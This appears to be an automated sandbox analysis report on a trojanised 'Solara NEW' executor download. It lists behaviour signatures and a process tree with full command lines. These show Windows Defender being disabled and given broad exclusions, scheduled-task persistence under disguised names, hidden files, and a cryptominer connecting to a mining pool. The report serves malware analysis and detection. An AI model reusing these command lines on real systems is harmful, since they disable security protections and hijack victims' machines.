  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                     msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
  These are most likely the browsers the sandbox launched for the URL target, but note that the sample also drops its own msedge.exe under C:\Recovery\WindowsRE, so msedge.exe rows without a pid cannot be attributed without checking the image path.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 18 IoCs
Processes: taskkill.exe (18 instances)
  pids: 6832, 2224, 400, 6264, 3412, 5912, 6012, 5988, 6492, 6412, 5420, 6904, 5140, 6956, 4964, 1712, 6748, 7120
  Pids are reused within the run: 400, 1712 and 6832 also appear as schtasks.exe, 5912 as MpCmdRun.exe and 6412 as tasklist.exe in other signatures, so correlate by time, not by pid alone.
-
Modifies data under HKEY_USERS 2 IoCs
Processes: chrome.exe
  Key created      \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry  chrome.exe
  Set value (int)  \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133742470251356163"  chrome.exe
-
Modifies registry class 6 IoCs
Processes: msedge.exe, WinSFX.exe, MpDefenderCoreService.exe, MpCmdRun.exe, RunShell.exe, firefox.exe
  Key created  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings  by each of the six processes above
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (20 instances)
  pids: 7032, 1844, 6832, 6776, 1664, 6352, 1712, 6972, 6696, 2244, 7088, 6348, 6840, 5680, 2104, 400, 4428, 6740, 7044, 6540
  Eighteen of these are the WmiPrvSE-spawned instances listed under "Process spawned unexpected child process"; 6840 and 2104 are the two that were not.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid, process, event count):
  1848 msedge.exe (2), 5112 msedge.exe (2), 388 identity_helper.exe (2), 1300 msedge.exe (2), 5472 javaw.exe (24), 5308 powershell.exe (3), 5264 powershell.exe (3), 5276 MpWinHelper32.exe (2), 5304 MpDefenderRuntime.exe (2), 3764 powershell.exe (3), 5944 powershell.exe (3), 5932 MpWinSDK.exe (2), 4712 powershell.exe (4), 4136 powershell.exe (3), 1896 powershell.exe (3), 6668 powershell.exe (2), 6892 powershell.exe (2)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: RunShell.exe
  pid 6496  RunShell.exe
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
  pid 656  (process name not given in the report)
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
Processes: msedge.exe, chrome.exe
  5112 msedge.exe (7 events), 7032 chrome.exe (14 events)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: javaw.exe, wmic.exe, powershell.exe (7 instances), MpWinHelper32.exe, MpWinSDK.exe, tasklist.exe (2 instances), WMIC.exe
  5472 javaw.exe: SeBackupPrivilege (twice), SeSecurityPrivilege, SeDebugPrivilege, SeRestorePrivilege
  5892 wmic.exe: the same 21 tokens enabled twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (LUIDs the report did not resolve to names). Enabling every privilege the token holds is WMIC's normal start-up behaviour, not evidence of escalation by the sample.
  SeDebugPrivilege: 5308 powershell.exe, 5264 powershell.exe, 5276 MpWinHelper32.exe, 3764 powershell.exe, 5944 powershell.exe, 5932 MpWinSDK.exe, 4712 powershell.exe, 4136 powershell.exe, 5704 tasklist.exe, 1896 powershell.exe, 5096 tasklist.exe
  6640 WMIC.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege (listing cut off at the report's 64-row cap)
-
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
pid process
5112 msedge.exe (all 64 entries)
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
pid process
5112 msedge.exe (24 entries)
6392 firefox.exe (24 entries)
7032 chrome.exe (16 entries)
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
pid process
5396 Solara NEW.exe
5472 javaw.exe
5472 javaw.exe
6068 WinSFX.exe
5552 WinDefender.exe
5748 MpWinDefenderService.exe
5804 MpWinDefenderService.exe
5312 MpDefenderCoreService.exe
5912 MpCmdRun.exe
4192 rar.exe
6392 firefox.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description pid process target process
PID 5112 wrote to memory of 2784 5112 msedge.exe msedge.exe (2 entries)
PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe (40 entries)
PID 5112 wrote to memory of 1848 5112 msedge.exe msedge.exe (2 entries)
PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe (20 entries)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
pid process
6692 attrib.exe
6600 attrib.exe
5648 attrib.exe
752 attrib.exe
Processes
Each entry below gives the image path, the full command line, the behaviours attributed to that process, and its PID; "[depth N]" is the entry's nesting level in the process tree.
[depth 1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://raw.githubusercontent.com/ByterCode/Solara-Excutor/refs/heads/main/Solara%20NEW.zip
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID: 5112

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd480846f8,0x7ffd48084708,0x7ffd48084718
PID: 2784

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
PID: 2164

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
- Suspicious behavior: EnumeratesProcesses
PID: 1848

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
PID: 2692

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
PID: 3788

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
PID: 4032

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:8
PID: 1012

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:8
- Suspicious behavior: EnumeratesProcesses
PID: 388

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
PID: 4432

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
PID: 4584

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:1
PID: 5072

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
PID: 232

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5972 /prefetch:8
PID: 1672

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
PID: 116

[depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5940 /prefetch:8
- Suspicious behavior: EnumeratesProcesses
PID: 1300
[depth 1] C:\Windows\System32\CompPkgSrv.exe
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID: 2068

[depth 1] C:\Windows\System32\CompPkgSrv.exe
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID: 2920

[depth 1] C:\Windows\System32\rundll32.exe
Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
PID: 5356
[depth 1] C:\Users\Admin\AppData\Local\Temp\Temp1_Solara NEW.zip\Solara NEW.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Temp1_Solara NEW.zip\Solara NEW.exe"
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID: 5396

[depth 2] C:\Program Files\Java\jre-1.8\bin\javaw.exe
Command line: "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\Temp1_Solara NEW.zip\Solara NEW.exe"
- Drops startup file
- Loads dropped DLL
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID: 5472

[depth 3] C:\Windows\SYSTEM32\reg.exe
Command line: reg query HKLM\HARDWARE\DESCRIPTION\System /v SystemBiosVersion
- Checks BIOS information in registry
- Modifies registry key
PID: 5852

[depth 3] C:\Windows\System32\Wbem\wmic.exe
Command line: wmic diskdrive get model
- Suspicious use of AdjustPrivilegeToken
PID: 5892

[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 5264

[depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 5308

[depth 3] C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinSFX.exe
Command line: C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinSFX.exe
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID: 6068
[depth 4] C:\Windows\SysWOW64\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows\Defender\9MtIZXiAw.vbe"
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID: 244

[depth 5] C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows\Defender\Es1BthyXvq2km5CiHkXHry3WVfzj.bat" "
- System Location Discovery: System Language Discovery
PID: 7048

[depth 6] C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe
Command line: "C:\Users\Admin\AppData\Roaming\Windows/Defender/RunShell.exe"
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
PID: 5688

[depth 7] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nvpxylj3\nvpxylj3.cmdline"
- Drops file in System32 directory
PID: 6720

[depth 8] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5752.tmp" "c:\Windows\System32\CSCB59BB1DD46334AD8911ABF5DB637A37.TMP"
PID: 5388

[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'
- Command and Scripting Interpreter: PowerShell
PID: 6288

[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\agentComponentFontNet\System.exe'
- Command and Scripting Interpreter: PowerShell
PID: 6148

[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\msedge.exe'
- Command and Scripting Interpreter: PowerShell
PID: 6796

[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe'
- Command and Scripting Interpreter: PowerShell
PID: 6764

[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\agentComponentFontNet\TrustedInstaller.exe'
- Command and Scripting Interpreter: PowerShell
PID: 6944

[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'
- Command and Scripting Interpreter: PowerShell
PID: 5500

[depth 7] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uAhO8zbU6i.bat"
PID: 5388

[depth 8] C:\Windows\system32\chcp.com
Command line: chcp 65001
PID: 5928

[depth 8] C:\Windows\system32\w32tm.exe
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
PID: 6228

[depth 8] C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe
Command line: "C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe"
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID: 6496
[depth 4] C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinHelper32.exe
Command line: "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinHelper32.exe"
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 5276

[depth 5] C:\Windows\SYSTEM32\cmd.exe
Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
PID: 5460

[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3764

[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 5944

[depth 5] C:\Windows\SYSTEM32\cmd.exe
Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdater" /tr "C:\Windows\system32\GoogleUpdater.exe"
PID: 5788

[depth 6] C:\Windows\system32\schtasks.exe
Command line: schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdater" /tr "C:\Windows\system32\GoogleUpdater.exe"
- Scheduled Task/Job: Scheduled Task
PID: 2104

[depth 5] C:\Windows\SYSTEM32\cmd.exe
Command line: "cmd" cmd /c "C:\Windows\system32\GoogleUpdater.exe"
PID: 6360

[depth 6] C:\Windows\system32\GoogleUpdater.exe
Command line: C:\Windows\system32\GoogleUpdater.exe
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID: 7108

[depth 7] C:\Windows\system32\cmd.exe
Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
PID: 2028

[depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
- Command and Scripting Interpreter: PowerShell
PID: 3592

[depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
- Command and Scripting Interpreter: PowerShell
PID: 4912

[depth 7] C:\Windows\system32\Microsoft\Libs\sihost64.exe
Command line: "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
- Executes dropped EXE
PID: 6872

[depth 7] C:\Windows\explorer.exe
Command line: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=4BHDQDtdSK2c9CQxpSptzvgbXgQ664JTqEnBvuXeueNLGGg7CYHPtQNEnZ3YK9MQgbE6dsg92yX4B6QXpG3v7HAS2nGUBKr --pass=x --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
PID: 6624
[depth 4] C:\Users\Admin\AppData\Roaming\Windows\Defender\WinDefender.exe
Command line: "C:\Users\Admin\AppData\Roaming\Windows\Defender\WinDefender.exe"
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID: 5552

[depth 5] C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinSDK.exe
Command line: "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinSDK.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 5932

[depth 6] C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"' & exit
PID: 5524

[depth 7] C:\Windows\system32\schtasks.exe
Command line: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"'
- Scheduled Task/Job: Scheduled Task
PID: 6840

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp58D9.tmp.bat""
PID: 5648

[depth 7] C:\Windows\system32\timeout.exe
Command line: timeout 3
- Delays execution with timeout.exe
PID: 1300

[depth 7] C:\Users\Admin\AppData\Roaming\svchost.exe
Command line: "C:\Users\Admin\AppData\Roaming\svchost.exe"
- Executes dropped EXE
PID: 7068

[depth 4] C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderRuntime.exe
Command line: "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderRuntime.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID: 5304

[depth 4] C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe
Command line: "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID: 5748

[depth 5] C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe
Command line: "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID: 5804
[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe'"
PID: 5908

[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 4136

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
PID: 4184

[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 4712

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe""
- Hide Artifacts: Hidden Files and Directories
PID: 2244

[depth 7] C:\Windows\system32\attrib.exe
Command line: attrib +h +s "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"
- Views/modifies file attributes
PID: 752

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
PID: 5040

[depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1896

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
PID: 1020

[depth 7] C:\Windows\system32\tasklist.exe
Command line: tasklist /FO LIST
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID: 5096

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
PID: 2612

[depth 7] C:\Windows\system32\tasklist.exe
Command line: tasklist /FO LIST
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID: 5704

[depth 6] C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
PID: 5516

[depth 7] C:\Windows\System32\Wbem\WMIC.exe
